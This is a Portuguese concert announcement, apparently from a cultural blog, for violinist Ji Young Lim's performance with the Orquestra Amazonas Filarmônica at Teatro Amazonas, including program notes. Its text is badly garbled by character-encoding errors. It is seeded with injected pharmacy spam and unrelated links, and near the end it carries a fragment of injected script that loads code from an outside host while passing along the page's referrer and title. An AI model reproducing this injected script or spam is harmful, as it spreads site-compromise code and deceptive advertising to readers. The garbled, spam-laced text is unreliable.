AmazonasMúsica sinfônicaProgramação

Ji Young Lim em Manaus

Teatro Amazonas recebe premiada violinista sul-coreana apresentaA�A?o A?nica em 20 de outubro.

 

Aclamada pela imprensa internacional como um fenA?meno na sua A?rea, a jovem violinista sul-coreana Ji Young Lim faz A?nica apresentaA�A?o em Manaus no dia 20 de outubro, quinta-feira, A�s 20h, no Teatro Amazonas. A artista A� acompanhada pela Orquestra Amazonas FilarmA?nica, sob regA?ncia do maestro Luiz Fernando Malheiro. O evento integra as comemoraA�A�es de 120 anos do Teatro Amazonas.

O programa tem a abertura da A?pera Semiramide, de Rossini, a Sinfonia n. 4 a�� TrA?gica, de Schubert, e Ji Young Lim como solista do Concerto para violino n. 5, de Mozart.

Nascida em 1995, em Seul, com apenas 20 anos foi a grande vencedora do cA�lebre concurso Rainha Elisabeth da BA�lgica, ediA�A?o 2015, uma das mais importantes competiA�A�es musicais do mundo.

A artista estA? em turnA? pelo Brasil e jA? se apresentou em Belo Horizonte, BelA�m e SA?o Paulo. Ela toca com um Stradivarius Huggins de 1708, instrumento cedido a ela pela Nippon Music Foundation, por quatro anos, como parte do prA?mio conquistado no concurso.

 

Ji Young Lim

Ji Young Lim comeA�ou a tocar violino aos 7 anos de idade. Depois de estudar no Instituto Nacional da Coreia, completou seus estudos musicais na Universidade Nacional de Artes da Coreia, sob supervisA?o do violinista Nam Yun Kim.

Lim vem tendo seus brilhantes talento e musicalidade reconhecidos em diversas competiA�A�es nacionais e internacionais. Destaque para os primeiros prA?mios conquistados no Concurso Internacional Euroasia, no JapA?o, em 2013, e no Concurso Internacional de Violino de Indianapolis, EUA, em 2014.

A violinista jA? se apresentou nos Estados Unidos, CanadA?, JapA?o, Coreia, Alemanha, SuA�A�a e BA�lgica, onde venceu o Concurso Rainha Elisabeth 2015. Lim foi a primeira instrumentista coreana a vencer o prestigioso concurso, que nessa ediA�A?o teve 69 instrumentistas de 20 diferentes paA�ses.

 

Orquestra Amazonas FilarmA?nica

Criada em 26 de setembro de 1997, a Orquestra Amazonas FilarmA?nica estA? prestes a completar 20 anos de atividades, sob a lideranA�a do maestro Luiz Fernando Malheiro, diretor artA�stico e regente titular, e vem, ao longo desses anos, se consolidando como uma das melhores e mais importantes orquestras brasileiras fora do eixo Rio-SA?o Paulo.

AlA�m de ser a orquestra oficial do Governo do Amazonas, que realiza o Festival de A�pera do Amazonas, apresenta anualmente temporadas de concertos sinfA?nicos, oferecendo A� populaA�A?o amazonense entretenimento cultural de alta qualidade. Destaque, em 2016, para a realizaA�A?o de nova ediA�A?o da sA�rie GuaranA?, purchase lanoxin digoxin em comemoraA�A?o aos 120 anos do Teatro Amazonas.

 

PROGRAMA: http://www.zareenfoods.com/?p=2919

Gioachino Rossini (1792-1868)
Abertura da A?pera comprar viagra sin receta Semiramide

Escrita em 1823, Semiramide tem uma das mais conhecidas e aclamadas aberturas de Rossini. Efervescente, a abertura, porA�m, estA? longe de transmitir o espA�rito da A?pera, uma tragA�dia dramA?tica baseada na lenda da rainha da AssA�ria. De porte sinfA?nico, a obra tem orquestraA�A?o simplesmente perfeita, melodias irresistA�veis e, plena de vigor e vitalidade, expressa o temperamento sempre essencialmente ensolarado de Rossini.

 

Wolfgang Amadeus Mozart (1756-1791)
Concerto para violino n. 5

Mozart compA?s seus cinco concertos para violino entre abril e dezembro de 1775, em Salzburgo. Embora revelem forte afinidade com as tradiA�A�es prA�-clA?ssicos, neles o jovem Mozart a�� entA?o com 19 anos a�� conseguiu encontrar novos meios de expressA?o totalmente em sintonia com o espA�rito de seu tempo. Verdadeira obra-prima, o Pills Concerto n. 5 A� o mais popular dos concertos para violino e uma das mais reluzentes joias do catA?logo de Mozart. A� certamente o mais original e o mais ousado. Embora claramente dentro da tradiA�A?o clA?ssica, tem um grau de exigA?ncias tA�cnicas que fizeram dele algo novo para o violino. O final da obra, construA�do sobre uma melodia ao estilo minueto, tem um interlA?dio cA?mico evocando musicalmente a terra dos paxA?s a�� levando a que o concerto seja frequentemente referido como Concerto Turco. Mozart recorreu a este exotismo em vA?rias de suas peA�as, a mais famosa delas a Sonata para piano K. 331, com o seu bem conhecido rondA? “alla turca”.

 

Franz Schubert (1797-1828)
Sinfonia n. 4 a�� TrA?gica Purchase

Schubert compA?s sua Quarta Sinfonia em 1816, quando tinha apenas 19 anos. Moldada segundo a linguagem das sinfonias de Haydn e Mozart, trouxe elementos harmA?nicos originais e sofisticaA�A?o melA?dica que serviria de inspiraA�A?o para as sinfonias para cordas compostas nos anos 1820 pelo jovem Mendelssohn. Batizada de TrA?gica, A� a A?nica entre todas as sinfonias de Schubert em tonalidade menor a�� e comeA�a justamente com um acorde “sinistro”, como que afirmando as intenA�A�es do compositor: pessimismo e gravidade. De todo modo, a obra nA?o A� tA?o tragicamente escura, hA? nela momentos extraordinA?rios de brilho e de grande beleza. Sua primeira apresentaA�A?o profissional ocorreu somente em 1849, mais de 20 anos apA?s a morte de Schubert.

 

SERVIA�O:

 

Ji Young Lim, violino Purchase

online Orquestra Amazonas FilarmA?nica

Luiz Fernando Malheiro, regA?ncia

 

20 de outubro, quinta-feira, A�s 20h

http://magic-dreamfactory.de/?p=13406 Teatro Amazonas (R. 10 de Julho, s/n, Centro a�� Manaus)

 

Ingressos: R$ 20 (plateia e frisas), demais assentos livres

 

SugestA?o etA?ria: livre

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

Faça seu comentário
movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.